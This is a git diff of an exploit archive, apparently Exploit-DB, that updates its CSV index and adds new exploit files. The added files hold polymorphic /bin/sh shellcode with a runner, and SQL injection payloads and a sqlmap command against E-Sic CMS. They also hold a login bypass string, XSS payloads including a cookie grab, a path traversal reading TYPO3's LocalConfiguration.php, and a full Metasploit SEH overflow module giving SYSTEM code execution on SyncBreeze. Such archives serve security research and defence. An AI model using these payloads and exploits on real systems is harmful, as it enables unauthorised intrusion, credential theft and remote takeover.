 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0
@ -38263,7 +38265,7 @@ id,file,description,date,author,platform,type,port
 41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
-41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
+41940,platforms/php/webapps/41940.py,"TYPO3 Extension News - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
 41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
 41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
 41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
@ -38672,3 +38674,12 @@ id,file,description,date,author,platform,type,port
 42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
 42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
 42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
+42978,platforms/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps,0
+42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' Parameter SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0
+42980,platforms/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps,0
+42981,platforms/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0
+42982,platforms/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0
+42983,platforms/php/webapps/42983.txt,"E-Sic Software livre CMS - Cross Site Scripting",2017-10-12,"Elber Tavares",php,webapps,0
+42985,platforms/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps,0
+42986,platforms/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
+42987,platforms/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting",2017-10-13,"Ishaq Mohammed",php,webapps,0
--- a/platforms/hardware/webapps/42986.txt
+++ b/platforms/hardware/webapps/42986.txt
@ -0,0 +1,25 @@
+# Exploit Title: Vulnerability XSS - Dreambox
+# Shodan Dork: Dreambox 200 
+# Date: 12/10/2017
+# Exploit Author: Thiago "THX" Sena
+# Vendor Homepage: https://www.dreamboxupdate.com
+# Version: 2.0.0
+# Tested on: kali linux, windows 7, 8.1, 10
+# CVE : CVE-2017-15287
+
+Vulnerabilty: Cross-site scripting (XSS) in plugin BouquetEditor
+
+---------------------------------------------------------------
+
+PoC: 
+
+- First you go to ( http://IP:PORT/bouqueteditor/ )
+
+- Then you go to the Bouquets tab, add a new bouquet
+
+- Then put the script (<script>alert(1)</script>)
+
+- Xss Vulnerability
+
+
+
--- a/platforms/lin_x86/shellcode/42977.c
+++ b/platforms/lin_x86/shellcode/42977.c
@ -0,0 +1,53 @@
+/*
+ Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes
+ Author: Manuel Mancera (@sinkmanu)
+ Tested on: Linux 3.16.0-4-586 #1 Debian 3.16.43-2+deb8u2 (2017-06-26)
+i686 GNU/Linux
+ 
+----------------- Assembly code -------------------
+
+global _start           
+
+section .text
+_start:
+    xor eax, eax
+    push eax
+    mov edi, 0x978cd092
+    mov ebx, edi
+    neg edi
+    push edi
+    sub ebx, 0x2e2aa163
+    push ebx
+    mov ebx, esp
+    push eax
+    push ebx
+    mov ecx, esp
+    mov al, 11
+    int 0x80
+ 
+---------------------------------------------------
+$ nasm -f elf32 poly-execve.nasm -o poly-execve.o
+$ ld poly-execve.o -o poly-execve
+$ objdump -d ./poly-execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$ ./shellcode
+Length: 30 bytes
+$
+*/
+ 
+#include <stdio.h>
+#include <string.h>
+
+const char code[] =  \
+"\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+int main()
+{
+    printf("Length: %d bytes\n", strlen(code));
+    (*(void(*)()) code)();
+    return 0;
+}
+
--- a/platforms/php/webapps/2554.php
+++ b/platforms/php/webapps/2554.php
@ -44,7 +44,7 @@ fclose($f);
 passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
 }
 ?>
-&lt;/textarea&gt;
+</textarea>
 <br>
 Powered By  Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
 </center>
--- a/platforms/php/webapps/42978.txt
+++ b/platforms/php/webapps/42978.txt
@ -0,0 +1,44 @@
+# Exploit Title: OctoberCMS 1.0.425 (aka Build 425) Stored XSS
+# Vendor Homepage: https://octobercms.com/
+# Software Link: https://octobercms.com/download
+# Exploit Author: Ishaq Mohammed ( https://www.exploit-db.com/author/?a=9086
+)
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# CVE: CVE-2017-15284
+
+1. Description
+
+Cross-Site Scripting exists in OctoberCMS 1.0.425 (aka Build 425), allowing
+a least privileged user to upload an SVG file containing malicious code as
+the Avatar for the profile. When this is opened by the Admin, it causes
+JavaScript execution in the context of the Admin account.
+
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15284
+
+2. Proof of Concept
+
+Steps to Reproduce:
+
+   - Login using a normal user and click on my account.
+   - Click on the avatar.
+   - Upload the malicious .svg file which contains the javascript
+   - Click on save.
+   - Login in another browser with Admin Credentials.
+   - Click on Settings > Administrators.
+   - Select the normal user's avatar and click on Attachment URL.
+
+3. Reference
+
+https://github.com/octobercms/library/commit/3bbbbf3da469f457881b5af902eb0b89b95189a2
+
+4. Solution
+
+The vulnerability will be patched by the vendor in the next release of
+OctoberCMS.
+
+-- 
+Best Regards,
+Ishaq Mohammed
+https://about.me/security-prince
--- a/platforms/php/webapps/42979.txt
+++ b/platforms/php/webapps/42979.txt
@ -0,0 +1,19 @@
+# Exploit Title: E-Sic Software livre CMS - Blind SQL Injection
+# Date: 12/10/2017
+# Exploit Author: Guilherme Assmann
+# Vendor Homepage: https://softwarepublico.gov.br/
+# Version: 1.0
+# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
+# Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+More informations: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398
+
+The vulnerability is in the search private area of e-sic without authentication
+---------------------------------------------------------------------
+Poc:
+  Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1
+
+  Parameter: q (GET)
+
+  Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx
+
+  sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs
--- a/platforms/php/webapps/42980.txt
+++ b/platforms/php/webapps/42980.txt
@ -0,0 +1,16 @@
+# Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
+Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
+https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
+windows 7, 8.1, 10 - Firefox# Download
+https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+More informations:
+http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html
+
+The vulnerability is in the login area of e-sic,
+where we can enter the panel only using some parameters such as
+username and password
+---------------------------------------------------------------------
+PoC:
+Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
+POST: http://vulnsite/esic/index/index.php
+DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
--- a/platforms/php/webapps/42981.txt
+++ b/platforms/php/webapps/42981.txt
@ -0,0 +1,25 @@
+# Exploit Title: E-Sic Software livre CMS - Sql Injection# Date:
+12/10/2017# Exploit Author: Elber Tavares
+# fireshellsecurity.team/
+# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
+Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
+https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+More informations:
+
+http://whiteboyz.xyz/esic-software-publico-sql-injection.html
+
+vulnerability is in the password reset parameter of the software,
+where we can send sql parameters and interact directly with the
+database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
+---------------------------------------------------------------------
+
+Url: http://vulnerablesite/esic/reset/
+
+POST: cpfcnpj=test&btsub=Enviar
+
+Parameter: cpfcnpj (POST)
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
+    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
+GJkR&btsub=Enviar
--- a/platforms/php/webapps/42982.txt
+++ b/platforms/php/webapps/42982.txt
@ -0,0 +1,36 @@
+# Exploit Title: E-Sic Software livre CMS - Sql Injection
+# Date: 12/10/2017
+# Exploit Author: Elber Tavares
+# fireshellsecurity.team/
+# Vendor Homepage: https://softwarepublico.gov.br/
+# Version: 1.0
+# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
+# Download
+https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+More informations:
+
+http://whiteboyz.xyz/esic-software-publico-sql-injection.html
+
+Vulnerability is in the zip code search script
+---------------------------------------------------------------------
+
+Url: http://localhost/esiclivre/restrito/inc/buscacep.php
+
+
+DATA:
+
+Parameter: f (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr
+
+    Type: UNION query
+    Title: MySQL UNION query (random number) - 6 columns
+    Payload: f=test' UNION ALL SELECT 3344,3344,
+
+CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),
+    3344,3344,3344#
--- a/platforms/php/webapps/42983.txt
+++ b/platforms/php/webapps/42983.txt
@ -0,0 +1,23 @@
+# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
+Date: 12/10/2017# Exploit Author: Elber Tavares
+# fireshellsecurity.team/
+# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
+Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
+https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
+More informations:
+http://whiteboyz.xyz/esic-software-publico-xss.html
+
+O XSS está presente na área de cadastro de solicitante,
+onde é possivel injetar códigos pelo input que recebe o nome do usuário
+
+---------------------------------------------------------------------
+
+Url: http://localhost/esic/index/
+
+POST: http://localhost/cadastro/index.php
+DATA:
+DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
+cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
+idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
+confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
+uf=&numero=&complemento=&acao=Salvar
--- a/platforms/php/webapps/42985.txt
+++ b/platforms/php/webapps/42985.txt
@ -0,0 +1,28 @@
+# Exploit Title: Typo3 Restler Extension - Local File Disclosure
+# Date: 2017-10-13
+# Exploit Author: CrashBandicot @dosperl
+# Vendor Homepage: https://www.aoe.com/
+# Software Link: https://extensions.typo3.org/extension/restler/
+# Tested on : MsWin
+# Version: 1.7.0 (last)
+
+
+# Vulnerability File : getsource.php
+
+3.      $file = $_GET['file'];
+13.        $text = file_get_contents($file);
+16.      die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");
+
+
+# PoC : 
+# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
+
+# https://i.imgur.com/zObmaDD.png
+
+
+# Timeline :
+
+# Vulnerability identified
+# Vendor notified
+# CVE number requested
+# Exploit released
--- a/platforms/php/webapps/42987.txt
+++ b/platforms/php/webapps/42987.txt
@ -0,0 +1,34 @@
+# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
+# Vendor Homepage: http://www.phpmyfaq.de/
+# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# CVE: CVE-2017-14619
+
+1. Description
+
+Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows
+remote attackers to inject arbitrary web script or HTML via the "Title of
+your FAQ" field in the Configuration Module.
+
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619
+
+2. Proof of Concept
+
+Steps to Reproduce:
+
+   1. Open the affected link http://localhost/phpmyfaq/admin/?action=config
+   with logged in user with administrator privileges
+   2. Enter the <marquee onscroll=alert(document.cookie)> in the “Title of
+   your FAQ field”
+   3. Save the Configuration
+   4. Login using any other user or simply click on the phpMyFAQ on the
+   top-right hand side of the web portal
+
+
+3. Solution:
+
+The Vulnerability will be fixed in the next release of phpMyFAQ
+
--- a/platforms/windows/remote/42984.rb
+++ b/platforms/windows/remote/42984.rb
@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'SyncBreeze v10.1.16 SEH GET Overflow',
+      'Description'    => %q{
+          There exists an unauthenticated SEH based vulnerability in the HTTP
+        server of Sync Breeze Enterprise v10.1.16, when sending a GET request
+        with an excessive length it is possible for a malicious user to overwrite the
+        SEH record and execute a payload that would run under the Windows NT AUTHORITY\SYSTEM account.
+
+        The SEH record is overwritten with a "POP,POP,RET" pointer from the application
+        library libspp.dll. This exploit has been successfully tested on Windows XP, 7 and
+        10 (x86->x64). It should work against all versions of Windows and service packs.
+      },
+
+      'Author'         => 'wetw0rk',
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'       => 800,
+          'EncoderType' => "alpha_upper",
+          'BadChars'    => "\x00\x0a\x0d"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows XP/7/10 (SyncBreez Enterprise v10.1.16)',
+            { 'Ret'    => 0x1001C65C,
+              'Offset' => 2495 
+            }]
+        ],
+      'DisclosureDate' => 'October 11 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)])
+
+  end
+
+  def exploit
+    connect
+
+    print_status("Trying #{target.name}")
+
+    # Make the JMP to the payload, else JMP into the A's acting as NOP's
+    # Using AlphaNum technique learned from Mut's in OSCE (aka a legend)
+    jumpcode = "\x25\x4a\x4d\x4e\x55"	# and    eax,0x554e4d4a
+    jumpcode << "\x25\x35\x32\x31\x2a"	# and    eax,0x2a313235
+    jumpcode << "\x2d\x37\x37\x37\x37"	# sub    eax,0x37373737
+    jumpcode << "\x2d\x74\x74\x74\x74"	# sub    eax,0x74747474
+    jumpcode << "\x2d\x55\x54\x55\x70"	# sub    eax,0x70555455
+    jumpcode << "\x50"			# push   eax
+    jumpcode << "\x25\x4a\x4d\x4e\x55"	# and    eax,0x554e4d4a
+    jumpcode << "\x25\x35\x32\x31\x2a"	# and    eax,0x2a313235
+    jumpcode << "\x2d\x2d\x76\x7a\x63"	# sub    eax,0x637a762d
+    jumpcode << "\x2d\x2d\x76\x7a\x30"	# sub    eax,0x307a762d
+    jumpcode << "\x2d\x25\x50\x7a\x30"	# sub    eax,0x307a5025
+    jumpcode << "\x50"			# push   eax
+    jumpcode << "\xff\xe4"		# jmp    esp
+    # greetz to kluo, and abatchy17
+    sploit = payload.encoded
+    sploit << 'A' * (target['Offset'] - payload.encoded.length)
+    sploit << "\x74\x06\x75\x06"
+    sploit << [target.ret].pack('V')
+    sploit << jumpcode
+    sploit << 'A' * (9067 - (target['Offset'] + payload.encoded.length + 8 + jumpcode.length))
+
+    send_request_cgi(
+      'uri'        =>  '/' + sploit,
+      'method'     =>  'GET',
+      'host'       =>  '4.2.2.2',
+      'connection' =>  'keep-alive'
+    )
+
+    handler
+    disconnect
+  end
+
+end